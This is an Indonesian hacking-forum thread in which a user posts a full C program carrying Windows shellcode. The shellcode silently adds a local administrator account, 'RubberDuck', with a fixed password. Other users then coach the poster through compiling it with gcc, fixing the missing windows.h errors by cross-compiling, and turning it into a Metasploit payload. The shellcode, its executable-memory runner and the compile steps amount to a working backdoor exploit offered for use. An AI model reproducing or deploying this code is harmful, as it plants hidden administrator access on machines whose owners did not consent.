[ASK] Tentang Shell Code

**Junior Riau** · 01-10-2012, 09:58 AM

ane lagi jalan2 ke tetangga
ketemu ini

Code:
/*

Title: Allwin WinExec add new local administrator + ExitProcess Shellcode - 272 bytes

Date: 2011-05-25

Author: RubberDuck

Web: http://bflow.security-portal.cz

Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32)

 -- command: cmd.exe /c net user RubberDuck mudbath /add && net localgroup administrators RubberDuck /add

 -- Username: RubberDuck

 -- Password: mudbath

*/

#include <stdio.h>

#include <windows.h>

int main(){

    unsigned char shellcode[]=

        "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"

        "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"

        "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"

        "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"

        "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"

        "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"

        "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"

        "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"

        "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"

        "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"

        "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"

        "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"

        "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE"

        "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53"

        "\xFF\xD2\x6A\x05\xEB\x23\xFF\xD0\x68\x65"

        "\x73\x73\x01\x8B\xDF\xFE\x4C\x24\x03\x68"

        "\x50\x72\x6F\x63\x68\x45\x78\x69\x74\x54"

        "\xFF\x74\x24\x1C\xFF\x54\x24\x1C\x57\xFF"

        "\xD0\xE8\xD8\xFF\xFF\xFF\x63\x6D\x64\x2E"

        "\x65\x78\x65\x20\x2F\x63\x20\x6E\x65\x74"

        "\x20\x75\x73\x65\x72\x20\x52\x75\x62\x62"

        "\x65\x72\x44\x75\x63\x6B\x20\x6D\x75\x64"

        "\x62\x61\x74\x68\x20\x2F\x61\x64\x64\x20"

        "\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63"

        "\x61\x6C\x67\x72\x6F\x75\x70\x20\x61\x64"

        "\x6D\x74\x6F\x72\x73\x20\x52\x75\x62\x62"

        "\x65\x72\x44\x75\x63\x6B\x20\x2F\x61\x64"

        "\x64\x00";

    LPVOID lpAlloc;

    void (*pfunc)();

    printf("size = %i bytes\n", lstrlen(shellcode) + 1);

    printf("-------------------------\nUsername: RubberDuck\nPassword: mudbath\n");

    system("PAUSE");

    lpAlloc = VirtualAlloc(0, 4096,

                           MEM_COMMIT,

                           PAGE_EXECUTE_READWRITE);

    if(lpAlloc == NULL){

        printf("Memory not allocated!\n");

        return 0;

    }

    memcpy(lpAlloc, shellcode, lstrlen(shellcode) + 1);

    pfunc = lpAlloc;

    pfunc();

    return 0;

}

disimpan dengan type apa??
.exe kah? atau apa??
trus cara pemakaiannya sama gak dengan (payloads + metasploit)??

iKONspirasi · 01-10-2012, 11:51 AM

dari listing code nya itu pake C bro

Code:
#include <stdio.h>

#include <windows.h>

abis itu di compile:

Code:
gcc -o fileoutput.exe shellcode.c

trus dari listing juga bisa diliat kok Tongue

Code:
command: cmd.exe /c net user RubberDuck mudbath /add && net localgroup administrators RubberDuck /add

-- Username: RubberDuck

-- Password: mudbath

jalankan fileoutput.exe kemudian masuk ke cmd trus bikin user baru dengan priviledge administrator Big Grin

klo mau dijadiin payload bisa aja, coba baca2 disini:
http://dev.metasploit.com/redmine/projec...ngExploits

ane pernah coba sih tp blom berhasil, post disini progresnya ya bro Smile

**Junior Riau** · 01-10-2012, 09:17 PM

(01-10-2012, 11:51 AM)konspirasi Wrote: dari listing code nya itu pake C bro

Code:
#include <stdio.h> #include <windows.h>

abis itu di compile:

Code:
gcc -o fileoutput.exe shellcode.c

trus dari listing juga bisa diliat kok

Code:
command: cmd.exe /c net user RubberDuck mudbath /add && net localgroup administrators RubberDuck /add -- Username: RubberDuck -- Password: mudbath

jalankan fileoutput.exe kemudian masuk ke cmd trus bikin user baru dengan priviledge administrator

klo mau dijadiin payload bisa aja, coba baca2 disini:
http://dev.metasploit.com/redmine/projec...ngExploits

ane pernah coba sih tp blom berhasil, post disini progresnya ya bro

ok oms,,

iya pake c,,ane juga lagi belajar c++ di kuliah,,buat komputer grafik,,hehe

mirip kek gini juga lah,,

uhya oms

Code:
gcc -o fileoutput.exe shellcode.c

gcc itu udah ada di bt5 commandnya?
fileoutputkan hasil yang kita inginkan,,
shellcode.c itu apa??
itu code tuh kita simpan dengan nama shellcode.c yah??
okok nae coba jadiin payload dulu

iKONspirasi · 01-10-2012, 09:20 PM

gcc itu GNU C Compiler, udah ada di BT5 kok, gdb buat debugging nya jg ada

shellcode.c diatas itu file utk menyimpan listing code c, yg fileoutput.exe itu hasil compiler c ke executable

**Junior Riau** · 01-10-2012, 09:38 PM

(01-10-2012, 09:20 PM)konspirasi Wrote: gcc itu GNU C Compiler, udah ada di BT5 kok, gdb buat debugging nya jg ada

shellcode.c diatas itu file utk menyimpan listing code c, yg fileoutput.exe itu hasil compiler c ke executable

ohh gitu toh om,,okok ntar dicoba,,ni lgi blajar om buat besok ambil nilai,,wkwkwk

**Junior Riau** · 01-11-2012, 10:15 AM

om jadinya begini,, ada errornya
[Image: 10ndphl.png]

ss nya

uh ya itu shellcode ane simpan dengan nama shellcode.c

iKONspirasi · 01-11-2012, 10:34 AM

ga keliatan ss nya, errornya apa?

**Junior Riau** · 01-12-2012, 07:09 AM

ini error nya oms

Code:
root@bt:~# gcc -o junior.exe shellcode.c 

shellcode.c:13:21: error: windows.h: No such file or directory

shellcode.c: In function ‘main’:

shellcode.c:45: error: ‘LPVOID’ undeclared (first use in this function)

shellcode.c:45: error: (Each undeclared identifier is reported only once

shellcode.c:45: error: for each function it appears in.)

shellcode.c:45: error: expected ‘;’ before ‘lpAlloc’

shellcode.c:52: error: ‘lpAlloc’ undeclared (first use in this function)

shellcode.c:53: error: ‘MEM_COMMIT’ undeclared (first use in this function)

shellcode.c:54: error: ‘PAGE_EXECUTE_READWRITE’ undeclared (first use in this function)

shellcode.c:61: warning: incompatible implicit declaration of built-in function ‘memcpy’

root@bt:~#

iKONspirasi · 01-12-2012, 08:19 AM

oh iya ane lupa, itu di include ada #include <windows.h> jd harus di compile di OS windows atau menggunakan cross-compiler

klo mau compile di linux coba download ini dulu:
http://www.wxwidgets.org/downloads/

**Junior Riau** · 01-12-2012, 04:40 PM

(01-12-2012, 08:19 AM)konspirasi Wrote: oh iya ane lupa, itu di include ada #include <windows.h> jd harus di compile di OS windows atau menggunakan cross-compiler

klo mau compile di linux coba download ini dulu:
http://www.wxwidgets.org/downloads/

okok,,donlod dulu deh,,,thanks oms,,ntar progress ane kabari lagi,,
asik ni bahas shellcode,, Smile